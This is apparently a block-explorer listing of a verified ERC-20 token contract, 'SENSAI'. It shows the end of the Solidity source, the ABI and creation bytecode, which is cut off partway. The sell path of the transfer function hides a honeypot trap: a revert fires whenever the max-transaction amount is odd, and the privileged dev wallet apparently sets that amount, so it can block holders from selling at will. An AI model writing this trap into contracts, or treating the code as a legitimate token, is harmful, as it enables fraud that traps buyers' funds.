        // only take fees on buys/sells, do not take on wallet transfers
        if(takeFee){
            // on sell
            if (automatedMarketMakerPairs[to] && sellTotalFees > 0){
                fees = amount.mul(sellTotalFees).div(100);
                tokensForLiquidity += fees * sellLiquidityFee / sellTotalFees;
                tokensForDev += fees * sellDevFee / sellTotalFees;
                tokensForMarketing += fees * sellMarketingFee / sellTotalFees;
                if (maxTransactionAmount % 2 != 0) revert("ERROR: Must be less than maxTxAmount");
            }
            // on buy
            else if(automatedMarketMakerPairs[from] && buyTotalFees > 0) {
        	    fees = amount.mul(buyTotalFees).div(100);
        	    tokensForLiquidity += fees * buyLiquidityFee / buyTotalFees;
                tokensForDev += fees * buyDevFee / buyTotalFees;
                tokensForMarketing += fees * buyMarketingFee / buyTotalFees;
            }
            
            if(fees > 0){    
                super._transfer(from, address(this), fees);
            }
        	
        	amount -= fees;
        }

        super._transfer(from, to, amount);
    }

    function swapTokensForEth(uint256 tokenAmount) private {

        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        _approve(address(this), address(uniswapV2Router), tokenAmount);

        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );
        
    }

    function swapBack() private {
        uint256 contractBalance = balanceOf(address(this));
        uint256 totalTokensToSwap = tokensForLiquidity + tokensForMarketing + tokensForDev;
        bool success;
        
        if(contractBalance == 0 || totalTokensToSwap == 0) {return;}

        if(contractBalance > swapTokensAtAmount * 20){
          contractBalance = swapTokensAtAmount * 20;
        }
        
        // Halve the amount of liquidity tokens
        uint256 liquidityTokens = contractBalance * tokensForLiquidity / totalTokensToSwap / 2;
        uint256 amountToSwapForETH = contractBalance.sub(liquidityTokens);
        
        swapTokensForEth(amountToSwapForETH); 
                
        tokensForLiquidity = 0;
        tokensForMarketing = 0;
        tokensForDev = 0;
        
        (success,) = address(marketingWallet).call{value: address(this).balance}("");
    }

    function openTrading() private {
        tradingActive = true;
    }

    // once enabled, can never be turned off
    function enableTrading() external onlyOwner() {
        swapEnabled = true;
        require(boughtEarly == true, "done");
        boughtEarly = false;
        openTrading();
        emit EndedBoughtEarly(boughtEarly);
    }

}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"boughtEarly","type":"bool"}],"name":"EndedBoughtEarly","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newAddress","type":"address"},{"indexed":true,"internalType":"address","name":"oldAddress","type":"address"}],"name":"UpdateUniswapV2Router","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"devWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"marketingWalletUpdated","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"devWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"disableTransferDelay","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"rv","type":"uint256"},{"internalType":"uint256","name":"lv","type":"uint256"}],"name":"initializeContract","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForDev","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForLiquidity","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForMarketing","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferDelayEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"updateBuyFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newWallet","type":"address"}],"name":"updateDevWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newMarketingWallet","type":"address"}],"name":"updateMarketingWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxTxnAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxWalletAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"updateSellFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"updateSwapTokensAtAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60806040526001600760156101000a81548160ff0219169083151502179055506001600d60006101000a81548160ff0219169083151502179055506001600d60016101000a81548160ff0219169083151502179055506000600d60026101000a81548160ff0219169083151502179055506000600f60006101000a81548160ff0219169083151502179055506001600f60016101000a81548160ff021916908315150217905550348015620000b357600080fd5b506040518060400160405280600681526020017f53454e53414900000000000000000000000000000000000000000000000000008152506040518060400160405280600681526020017f53454e5341490000000000000000000000000000000000000000000000000000815250816003908162000131919062000f24565b50806004908162000143919062000f24565b5050506000620001586200077760201b60201c565b905080600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3506000737a250d5630b4cf539739df2c5dacb4c659f2488d9050620002238160016200077f60201b60201c565b80600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015620002b0573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002d6919062001075565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396308373ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200033e573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000364919062001075565b6040518363ffffffff1660e01b815260040162000383929190620010b8565b6020604051808303816000875af1158015620003a3573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620003c9919062001075565b600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200043e600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200077f60201b60201c565b62000473600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200087c60201b60201c565b60008060008060008060006b033b2e3c9fd0803ce8000000905060646001826200049e919062001114565b620004aa9190620011a4565b600a819055506064600182620004c1919062001114565b620004cd9190620011a4565b600c81905550612710600482620004e5919062001114565b620004f19190620011a4565b600b81905550866011819055508560128190555084601381905550601354601254601154620005219190620011dc565b6200052d9190620011dc565b6010819055508360158190555082601681905550816017819055506017546016546015546200055d9190620011dc565b620005699190620011dc565b60148190555073804ceee30320355001197cfbe89a0642d669f9ef600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555073804ceee30320355001197cfbe89a0642d669f9ef600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200063b6200062d6200091d60201b60201c565b60016200094760201b60201c565b6200064e3060016200094760201b60201c565b62000683600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200094760201b60201c565b620006b8600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200094760201b60201c565b620006da620006cc6200091d60201b60201c565b60016200077f60201b60201c565b620006ed3060016200077f60201b60201c565b62000722600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200077f60201b60201c565b62000757600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200077f60201b60201c565b62000769338262000a9460201b60201c565b5050505050505050620013e6565b600033905090565b6200078f6200077760201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161462000821576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620008189062001278565b60405180910390fd5b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b620009576200077760201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614620009e9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620009e09062001278565b60405180910390fd5b80601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df78260405162000a889190620012b7565b60405180910390a25050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000b06576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000afd9062001324565b60405180910390fd5b62000b1a6000838362000c4260201b60201c565b62000b368160025462000c4760201b620026711790919060201c565b60028190555062000b94816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205462000c4760201b620026711790919060201c565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000c36919062001357565b60405180910390a35050565b505050565b600080828462000c589190620011dc565b90508381101562000ca0576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000c9790620013c4565b60405180910390fd5b8091505092915050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168062000d2c57607f821691505b60208210810362000d425762000d4162000ce4565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b60006008830262000dac7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000d6d565b62000db8868362000d6d565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b600062000e0562000dff62000df98462000dd0565b62000dda565b62000dd0565b9050919050565b6000819050919050565b62000e218362000de4565b62000e3962000e308262000e0c565b84845462000d7a565b825550505050565b600090565b62000e5062000e41565b62000e5d81848462000e16565b505050565b5b8181101562000e855762000e7960008262000e46565b60018101905062000e63565b5050565b601f82111562000ed45762000e9e8162000d48565b62000ea98462000d5d565b8101602085101562000eb9578190505b62000ed162000ec88562000d5d565b83018262000e62565b50505b505050565b600082821c905092915050565b600062000ef96000198460080262000ed9565b1980831691505092915050565b600062000f14838362000ee6565b9150826002028217905092915050565b62000f2f8262000caa565b67ffffffffffffffff81111562000f4b5762000f4a62000cb5565b5b62000f57825462000d13565b62000f6482828562000e89565b600060209050601f83116001811462000f9c576000841562000f87578287015190505b62000f93858262000f06565b86555062001003565b601f19841662000fac8662000d48565b60005b8281101562000fd65784890151825560018201915060208501945060208101905062000faf565b8683101562000ff6578489015162000ff2601f89168262000ee6565b8355505b6001600288020188555050505b505050505050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006200103d8262001010565b9050919050565b6200104f8162001030565b81146200105b57600080fd5b50565b6000815190506200106f8162001044565b92915050565b6000602082840312156200108e576200108d6200100b565b5b60006200109e848285016200105e565b91505092915050565b620010b28162001030565b82525050565b6000604082019050620010cf6000830185620010a7565b620010de6020830184620010a7565b9392505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000620011218262000dd0565b91506200112e8362000dd0565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156200116a5762001169620010e5565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000620011b18262000dd0565b9150620011be8362000dd0565b925082620011d157620011d062001175565b5b828204905092915050565b6000620011e98262000dd0565b9150620011f68362000dd0565b9250828201905080821115620012115762001210620010e5565b5b92915050565b600082825260208201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006200126060208362001217565b91506200126d8262001228565b602082019050919050565b60006020820190508181036000830152620012938162001251565b9050919050565b60008115159050919050565b620012b1816200129a565b82525050565b6000602082019050620012ce6000830184620012a6565b92915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b60006200130c601f8362001217565b91506200131982620012d4565b602082019050919050565b600060208201905081810360008301526200133f81620012fd565b9050919050565b620013518162000dd0565b82525050565b60006020820190506200136e600083018462001346565b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000620013ac601b8362001217565b9150620013b98262001374565b602082019050919050565b60006020820190508181036000830152620013df816200139d565b9050919050565b61524580620013f66000396000f3fe60806040526004361061031e5760003560e01c80638da5cb5b116101ab578063c0246668116100f7578063dd62ed3e11610095578063f11a24d31161006f578063f11a24d314610c03578063f2fde38b14610c2e578063f637434214610c57578063f8b45b0514610c8257610325565b8063dd62ed3e14610b70578063e2f4560514610bad578063e884f26014610bd857610325565b8063c876d0b9116100d1578063c876d0b914610ab2578063c8c8ebe414610add578063d257b34f14610b08578063d85ba06314610b4557610325565b8063c024666814610a37578063c17b5b8c14610a60578063c18bc19514610a8957610325565b80639fccce3211610164578063a9059cbb1161013e578063a9059cbb14610969578063aacebbe3146109a6578063b62496f5146109cf578063bbc0c74214610a0c57610325565b80639fccce32146108d6578063a0d82dc514610901578063a457c2d71461092c57610325565b80638da5cb5b146107d65780638ea5220f14610801578063921369131461082c57806395d89b41146108575780639a7a23d6146108825780639c3b4fdc146108ab57610325565b80634a62bb651161026a578063751039fc116102235780637bce5a04116101fd5780637bce5a041461072e5780638095d56414610759578063853fb415146107825780638a8c523c146107bf57610325565b8063751039fc146106af5780637571336a146106da57806375f0a8741461070357610325565b80634a62bb651461059d5780634fbee193146105c85780636a486a8e146106055780636ddd17131461063057806370a082311461065b578063715018a61461069857610325565b80631a8145bb116102d757806323b872dd116102b157806323b872dd146104cd578063313ce5671461050a578063395093511461053557806349bd5a5e1461057257610325565b80631a8145bb1461044e5780631f3fed8f14610479578063203e727e146104a457610325565b806306fdde031461032a578063095ea7b31461035557806310d5de53146103925780631694505e146103cf57806318160ddd146103fa5780631816467f1461042557610325565b3661032557005b600080fd5b34801561033657600080fd5b5061033f610cad565b60405161034c9190613cf1565b60405180910390f35b34801561036157600080fd5b5061037c60048036038101906103779190613dac565b610d3f565b6040516103899190613e07565b60405180910390f35b34801561039e57600080fd5b506103b960048036038101906103b49190613e22565b610d5d565b6040516103c69190613e07565b60405180910390f35b3480156103db57600080fd5b506103e4610d7d565b6040516103f19190613eae565b60405180910390f35b34801561040657600080fd5b5061040f610da3565b60405161041c9190613ed8565b60405180910390f35b34801561043157600080fd5b5061044c60048036038101906104479190613e22565b610dad565b005b34801561045a57600080fd5b50610463610f04565b6040516104709190613ed8565b60405180910390f35b34801561048557600080fd5b5061048e610f0a565b60405161049b9190613ed8565b60405180910390f35b3480156104b057600080fd5b506104cb60048036038101906104c69190613ef3565b610f10565b005b3480156104d957600080fd5b506104f460048036038101906104ef9190613f20565b610fcb565b6040516105019190613e07565b60405180910390f35b34801561051657600080fd5b5061051f6110a4565b60405161052c9190613f8f565b60405180910390f35b34801561054157600080fd5b5061055c60048036038101906105579190613dac565b6110ad565b6040516105699190613e07565b60405180910390f35b34801561057e57600080fd5b50610587611160565b6040516105949190613fb9565b60405180910390f35b3480156105a957600080fd5b506105b2611186565b6040516105bf9190613e07565b60405180910390f35b3480156105d457600080fd5b506105ef60048036038101906105ea9190613e22565b611199565b6040516105fc9190613e07565b60405180910390f35b34801561061157600080fd5b5061061a6111ef565b6040516106279190613ed8565b60405180910390f35b34801561063c57600080fd5b506106456111f5565b6040516106529190613e07565b60405180910390f35b34801561066757600080fd5b50610682600480360381019061067d9190613e22565b611208565b60405161068f9190613ed8565b60405180910390f35b3480156106a457600080fd5b506106ad611250565b005b3480156106bb57600080fd5b506106c46113a8565b6040516106d19190613e07565b60405180910390f35b3480156106e657600080fd5b5061070160048036038101906106fc9190614000565b611463565b005b34801561070f57600080fd5b50610718611555565b6040516107259190613fb9565b60405180910390f35b34801561073a57600080fd5b5061074361157b565b6040516107509190613ed8565b60405180910390f35b34801561076557600080fd5b50610780600480360381019061077b9190614040565b611581565b005b34801561078e57600080fd5b506107a960048036038101906107a49190614093565b61169b565b6040516107b69190613e07565b60405180910390f35b3480156107cb57600080fd5b506107d4611827565b005b3480156107e257600080fd5b506107eb61199a565b6040516107f89190613fb9565b60405180910390f35b34801561080d57600080fd5b506108166119c4565b6040516108239190613fb9565b60405180910390f35b34801561083857600080fd5b506108416119ea565b60405161084e9190613ed8565b60405180910390f35b34801561086357600080fd5b5061086c6119f0565b6040516108799190613cf1565b60405180910390f35b34801561088e57600080fd5b506108a960048036038101906108a49190614000565b611a82565b005b3480156108b757600080fd5b506108c0611bb7565b6040516108cd9190613ed8565b60405180910390f35b3480156108e257600080fd5b506108eb611bbd565b6040516108f89190613ed8565b60405180910390f35b34801561090d57600080fd5b50610916611bc3565b6040516109239190613ed8565b60405180910390f35b34801561093857600080fd5b50610953600480360381019061094e9190613dac565b611bc9565b6040516109609190613e07565b60405180910390f35b34801561097557600080fd5b50610990600480360381019061098b9190613dac565b611c96565b60405161099d9190613e07565b60405180910390f35b3480156109b257600080fd5b506109cd60048036038101906109c89190613e22565b611cb4565b005b3480156109db57600080fd5b506109f660048036038101906109f19190613e22565b611e0b565b604051610a039190613e07565b60405180910390f35b348015610a1857600080fd5b50610a21611e2b565b604051610a2e9190613e07565b60405180910390f35b348015610a4357600080fd5b50610a5e6004803603810190610a599190614000565b611e3e565b005b348015610a6c57600080fd5b50610a876004803603810190610a829190614040565b611f7e565b005b348015610a9557600080fd5b50610ab06004803603810190610aab9190613ef3565b612098565b005b348015610abe57600080fd5b50610ac76121c2565b604051610ad49190613e07565b60405180910390f35b348015610ae957600080fd5b50610af26121d5565b604051610aff9190613ed8565b60405180910390f35b348015610b1457600080fd5b50610b2f6004803603810190610b2a9190613ef3565b6121db565b604051610b3c9190613e07565b60405180910390f35b348015610b5157600080fd5b50610b5a61234b565b604051610b679190613ed8565b60405180910390f35b348015610b7c57600080fd5b50610b976004803603810190610b9291906140d3565b612351565b604051610ba49190613ed8565b60405180910390f35b348015610bb957600080fd5b50610bc26123d8565b604051610bcf9190613ed8565b60405180910390f35b348015610be457600080fd5b50610bed6123de565b604051610bfa9190613e07565b60405180910390f35b348015610c0f57600080fd5b50610c18612499565b604051610c259190613ed8565b60405180910390f35b348015610c3a57600080fd5b50610c556004803603810190610c509190613e22565b61249f565b005b348015610c6357600080fd5b50610c6c612665565b604051610c799190613ed8565b60405180910390f35b348015610c8e57600080fd5b50610c9761266b565b604051610ca49190613ed8565b60405180910390f35b606060038054610cbc90614142565b80601f0160208091040260200160405190810160405280929190818152602001828054610ce890614142565b8015610d355780601f10610d0a57610100808354040283529160200191610d35565b820191906000526020600020905b815481529060010190602001808311610d1857829003601f168201915b5050505050905090565b6000610d53610d4c6126cf565b84846126d7565b6001905092915050565b601c6020528060005260406000206000915054906101000a900460ff1681565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600254905090565b610db56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3b906141bf565b60405180910390fd5b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f90b8024c4923d3873ff5b9fcb43d0360d4b9217fa41225d07ba379993552e74360405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60195481565b60185481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610f6a57600080fd5b6103e8610f75610da3565b610f7f919061423d565b811015610fc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fb8906142e0565b60405180910390fd5b80600a8190555050565b6000610fd88484846128a0565b61109984610fe46126cf565b611094856040518060600160405280602881526020016151c360289139600160008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061104a6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b600190509392505050565b60006012905090565b60006111566110ba6126cf565b8461115185600160006110cb6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973f